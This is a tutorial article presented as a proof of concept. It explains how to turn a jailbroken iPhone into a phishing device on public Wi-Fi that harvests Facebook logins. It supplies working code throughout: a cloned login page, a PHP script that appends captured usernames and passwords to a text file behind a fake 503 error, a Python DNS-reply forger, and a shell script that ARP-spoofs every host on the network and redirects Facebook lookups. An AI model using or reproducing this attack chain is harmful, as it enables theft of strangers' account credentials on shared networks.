Phishing on an iDevice

by Jared DeWitt

This article was written with the intent that none of this be used for malicious acts.  This is only a proof-of-concept and should never be used for any personal gain.

In this article, I will be going over how to turn your iDevice into a phishing device, allowing you to impersonate a trusted site and trick users into giving up personal information.  In this example, we'll be harvesting facebook.com account credentials.

The idea is simple.

You'll connect to a public wireless network from your iDevice, forge the DNS answers that other clients on that network get for facebook.com so that the name points at your device, and then host your own copy of facebook.com there.  Your copy prompts the user for username/password, logs them to a file, and then shows a fake error page so the victim thinks Facebook is simply down.

I got this idea while watching a podcast from Hak5.

Darren used a device called a Wi-Fi Pineapple.  I, being cheap, decided to try something similar with my iPhone instead of purchasing another piece of gear.  (Thanks, Darren!)

lighttpd.conf:

include "mod_fastcgi.conf"
server.document-root = "/htdocs"
server.port = 80

server.tag = "lighttpd"
server.errorlog    = "/htdocs/log/error.log"
accesslog.filename = "/htdocs/log/access.log"

mimetype.use-xattr = "disable"

##
## mimetype mapping
##
mimetype.assign = (
  ".jpg"  => "image/jpeg",
  ".jpeg" => "image/jpeg",
  ".png"  => "image/png",
  ".css"  => "text/css",
  ".html" => "text/html",
  ".htm"  => "text/html",
  ".js"   => "text/javascript",

# make the default mime type application/octet-stream.
  ""      => "application/octet-stream",
)

# Lines added below to enable PHP.  mod_fastcgi hands .php requests to
# php-cgi (configured in the included mod_fastcgi.conf) and mod_accesslog is
# what accesslog.filename above needs.  Load each module once only.

server.modules = (
        "mod_access",
        "mod_accesslog",
        "mod_fastcgi",
        "mod_rewrite",
        "mod_auth"
)

# Everything under /htdocs is served to any client that asks, including the
# logs and the text file error.php drops captured credentials into.  Keep the
# other people on the network from reading them.
url.access-deny = ( ".txt", ".log" )

index-file.names = ( "index.html" )

You should now be able to start your lighttpd server:

# lighttpd -f /etc/lighttpd/lighttpd.conf

The next step is to create a fake Facebook page.

I recommend heading over to the facebook.com main page, choosing "Save Page As," and saving it as a complete web page (the HTML plus its images, stylesheets, and scripts).  Upload the result to your iDevice's /htdocs folder via SCP.

Rename facebook.html to index.html.

Edit index.html so that the login form's username field is named name and the password field is named pass; error.php reads exactly those two POST fields.

Also edit the form so that submitting it sends a POST to error.php (the form's action) instead of to Facebook.

Create an error.php file in /htdocs.  You can use this one (borrowed from Darren over at Hak5):

error.php:

<?php
// Send a real 503 status so the "outage" looks right to the browser as well.
// This must come before any output, which is why the PHP block is first.
header("HTTP/1.1 503 Service Temporarily Unavailable");

// The referer is optional and client-controlled; reading it unconditionally
// raises an "undefined index" notice whenever a browser omits it.
$ref   = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-';
$today = date("F j, Y, g:i a");

if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = isset($_POST['pass']) ? stripslashes($_POST['pass']) : '';
        // Encoded so a crafted username cannot inject markup if the log is
        // ever viewed in a browser.  Note this rewrites & < > ' " in the
        // password too; drop the second call if you need the raw value.
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

        // Absolute path: the same file "tail -f /htdocs/bitches.txt" watches.
        $filed = @fopen("/htdocs/bitches.txt", "a+");
        if ($filed !== false) {
                fwrite($filed, "$content\n");
                fclose($filed);
        }
}
?>

<html><body>
<h1>503: Service Temporarily Unavailable</h1>
</body></html>

Also, create a text file in /htdocs for error.php to dump the creds into, and make sure the user your PHP runs as can write to it.  In this case, it will be bitches.txt (thanks again, Darren).

Now, whenever someone hits your index.html, they'll be presented with a page that looks very similar to Facebook.  When they sign in to your fake site, it snags the name and password entries, appends them to bitches.txt, and shows a fake 503 error page, so the victim assumes Facebook is down rather than that they were phished.

Our phishing page is now built!

We just have to make sure people land on it when they try to hit the real facebook.com.  For this task, we'll be using dSniff.  Oh, how we love you, dSniff.  I found a good copy in Cydia from theWorm repo (theworm.altervista.org/cydia).  Two of its tools do the work: arpspoof tells the other clients on the network that the iDevice is the gateway, so their traffic (DNS lookups included) flows through the device, and dnsspoof watches those lookups and answers any query for a name listed in its hosts file with the device's own address.  There are other ways to "man-in-the-middle," but it's simplest to use dnsspoof.  Keep in mind that only plain http:// requests end up on your page: lighttpd listens on port 80 only, so a browser that goes straight to https://www.facebook.com gets a failed connection, not the fake site.
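To make concrete what dnsspoof does with that hosts file, here is an added example in Python; it is not dSniff's code and not part of the original article.  It parses a DNS query, matches the queried name against a dnsspoof-style hosts file, and builds the forged A-record reply carrying the victim's transaction ID.  The hosts file and the queries are constructed for the example, and the wildcard matching uses shell-style fnmatch rules, which is my assumption about the pattern syntax rather than a copy of dnsspoof's matcher.  It also shows why a lone *.facebook.com entry does not cover the bare facebook.com.

```python
import fnmatch
import struct

# Constructed sample hosts file in dnsspoof's "address hostname" layout.
# Both entries are needed: "*.facebook.com" matches www.facebook.com but not
# the bare name, because the pattern requires a dot before "facebook".
HOSTS_TEXT = """\
# address        hostname (wildcards allowed)
192.168.1.50     facebook.com
192.168.1.50     *.facebook.com
"""


def load_hosts(text):
    """Parse hosts-file text into a list of (pattern, ip) pairs; first match wins."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, pattern = line.split()
        entries.append((pattern.lower(), ip))
    return entries


def match_host(qname, entries):
    """Return the spoof address for qname, or None if no pattern matches.

    Shell-style wildcard matching over the whole name is an assumption of
    this example; dnsspoof's own matcher is not reproduced here.
    """
    name = qname.lower().rstrip(".")
    for pattern, ip in entries:
        if fnmatch.fnmatchcase(name, pattern):
            return ip
    return None


def build_query(txid, name, qtype=1):
    """Build a standard recursive DNS query (qtype 1 = A); used to construct input."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split("."))
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    """Return (txid, qname, qtype, raw question section) from a DNS query packet."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount < 1:
        raise ValueError("not a DNS query")
    labels, pos = [], 12
    while True:
        length = pkt[pos]
        pos += 1
        if length == 0:
            break
        labels.append(pkt[pos:pos + length].decode("ascii"))
        pos += length
    qtype, _qclass = struct.unpack("!HH", pkt[pos:pos + 4])
    pos += 4
    return txid, ".".join(labels), qtype, pkt[12:pos]


def forge_reply(query_pkt, entries, ttl=60):
    """Forge an A-record answer for a query whose name is in the hosts list.

    The reply copies the victim's transaction ID and question verbatim, sets
    QR/RD/RA, and appends one answer pointing the name at the spoof address.
    Returns None when the name is not spoofed (the real resolver answers then).
    """
    txid, qname, qtype, question = parse_query(query_pkt)
    if qtype != 1:
        return None
    ip = match_host(qname, entries)
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    # Name is a compression pointer to offset 12 (the question), type A, class IN.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4)
    answer += bytes(int(octet) for octet in ip.split("."))
    return header + question + answer


def answer_address(reply):
    """Extract the dotted-quad address from the first answer of a forged reply."""
    pos = 12
    while reply[pos] != 0:          # skip the question name
        pos += 1 + reply[pos]
    pos += 1 + 4                    # terminator, qtype, qclass
    pos += 2                        # compression pointer
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", reply[pos:pos + 10])
    pos += 10
    return ".".join(str(b) for b in reply[pos:pos + rdlen])


if __name__ == "__main__":
    entries = load_hosts(HOSTS_TEXT)
    for name in ("www.facebook.com", "facebook.com", "example.org"):
        reply = forge_reply(build_query(0x1234, name), entries)
        print(name, "->", answer_address(reply) if reply else "not spoofed")
```

The real tool sniffs the query off the wire and sends this forged datagram back to the client from the resolver's address and port; the victim's stub resolver accepts whichever matching answer arrives first, which is why the attack wants the query passing through the device rather than a race against the genuine reply.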

You'll now want a terminal on your device so you don't have to pull up a computer to initiate the attack.  There are plenty out there to download.  Find one you like in Cydia.  I personally use MobileTerminal.

This next one is optional, but handy.  Go get insomnia in Cydia.  It keeps your Wi-Fi active while the device is locked; otherwise iOS drops the wireless connection soon after the screen locks, and your attack stops with it.

I created a simple shell script to allow you to initiate everything all with one command instead of multiple.

Save the following as pwn.sh in /var/root.  (I snagged most of this from trcx over at ihackmyi.com):

pwn.sh:

#!/bin/sh
# Our own address on the Wi-Fi interface (en0 on an iDevice) and the gateway's.
iDeviceIP=`ifconfig en0 | grep "inet " | awk '/inet/ { print $2 }'`
routerIP=`netstat -r | grep default | grep en0 | grep -oE '([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}'`
# Quoted: unquoted, the shell would treat the asterisk as a filename glob.
fURL='*.facebook.com'
clear
echo "$iDeviceIP"
echo "$routerIP"
echo "$fURL"
sleep 2

clear

echo "[+] Writing /etc/dnsspoof.conf"
# dnsspoof hosts file: "address  hostname", wildcards allowed.  The wildcard
# entry covers www.facebook.com and friends but not the bare facebook.com,
# so write both.
echo "$iDeviceIP        facebook.com" >  /etc/dnsspoof.conf
echo "$iDeviceIP        $fURL"        >> /etc/dnsspoof.conf

sleep 2

echo "[>>>] Launching Attack!"

echo "[>>>] Starting httpd server"
lighttpd -f /etc/lighttpd/lighttpd.conf
sleep 2

# Optional: forward the traffic we attract so the victims' other browsing keeps
# working instead of dying the moment they are ARP-spoofed (needs sysctl).
sysctl -w net.inet.ip.forwarding=1

# arpspoof and dnsspoof are independent programs; piping one into the other
# only runs them side by side.  Run arpspoof in the background (no -t: answer
# every host on the LAN, claiming the gateway's address) and dnsspoof in the
# foreground.  arpspoof restores the real gateway MAC when it gets SIGINT, so
# stop it that way when dnsspoof exits or we are interrupted.
arpspoof -i en0 "$routerIP" &
arpPID=$!
trap 'kill -INT "$arpPID" 2>/dev/null' EXIT INT TERM
dnsspoof -i en0 -f /etc/dnsspoof.conf

Initiate the attack (about time!)

Connect to a public Wi-Fi network from your device.

Open up a terminal and become root.

Launch your pwn.sh.

Have a cup of coffee and: tail -f /htdocs/bitches.txt

Thanks for sticking with me on this one!
